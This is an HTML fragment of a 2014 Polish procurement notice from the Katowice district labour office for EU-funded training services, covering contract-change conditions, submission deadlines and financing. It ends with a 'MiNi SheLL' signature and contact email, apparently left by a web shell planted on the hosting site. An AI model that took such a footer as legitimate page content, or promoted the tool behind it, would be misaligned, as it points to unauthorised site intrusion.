<li>3 - Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 25</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z warunkami podanymi poniżej:
a) zmiana podwykonawcy;
- dopuszcza się zmianę wskazanego podwykonawcy lub wprowadzenie podwykonawcy w zakresie nieprzewidzianym w złożonej ofercie; w przypadku, gdy podwykonawca udostępnił Wykonawcy swoje zasoby w celu wykazania spełniania warunków udziału w niniejszym postępowaniu, nowy podwykonawca musi spełniać podane w SIWZ wymogi w takim samym zakresie, co poprzedni podwykonawca.
b) zmiana kadry realizującej przedmiot zamówienia wyłącznie w sytuacjach losowych niezależnych od wykonawcy pod warunkiem:
- powiadomienia Zamawiającego o zamiarze zmiany
- podania powodów zmiany
- zaproponowania osób, których kwalifikacje zawodowe, doświadczenie i wykształcenie odpowiadać będą kwalifikacjom zawodowym, doświadczeniu i wykształceniu osób podanych w wykazie zgodnie z załącznikiem nr 6 do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Katowicach
ul. Pośpiecha 14
40-852 Katowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.03.2014 godzina 08:00, miejsce: Powiatowy Urząd Pracy w Katowicach
ul. Pośpiecha 14
40-852 Katowice
BIURO PODAWCZE.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Restart kariery Poddziałanie 8.1.2 Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com